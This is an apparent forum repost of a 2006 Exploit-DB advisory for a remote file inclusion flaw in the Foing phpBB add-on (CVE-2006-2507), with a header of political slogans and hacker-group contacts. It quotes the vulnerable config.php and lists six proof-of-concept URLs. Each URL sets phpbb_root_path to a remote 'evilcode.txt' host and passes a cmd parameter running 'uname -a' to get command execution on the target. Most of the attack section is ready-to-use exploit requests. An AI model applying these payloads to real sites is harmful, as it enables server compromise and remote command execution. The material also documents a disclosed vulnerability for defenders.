Exploit Foing 0.7.0 - 'phpBB' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1778
Проверка EDB
  1. Пройдено
Автор
KURDISH SECURITY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2507
Дата публикации
2006-05-12
Код:
# Kurdish Security Advisory
# Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
# Foing Remote File Include Vulnerability [PHPBB] :}
# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan
# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & [email protected]
# Risk : High
# Class : Remote
# Script : Foing
# Script Website : http://foing.sourceforge.net/
# Version : Foing 0.7.0
                 0.6.0
                 0.5.0
                 0.4.0
                 0.3.0
                 0.2.0
# w0rkz : "Powered by foing"

# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc..

--------------------------------------------------------------------------------

# cmd shell example:
# cmd shell variable: ($_GET[cmd]);

Vulnerable code :

Get along at directory config.php

did you meet of ..

<?php

define('FOING_INSTALLED', true);

$phpbb_root_path = '../';
$foing_prefix = $table_prefix;

?>

Proof Of Concept :
http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a

# milw0rm.com [2006-05-12]
 
Источник
www.exploit-db.com

Похожие темы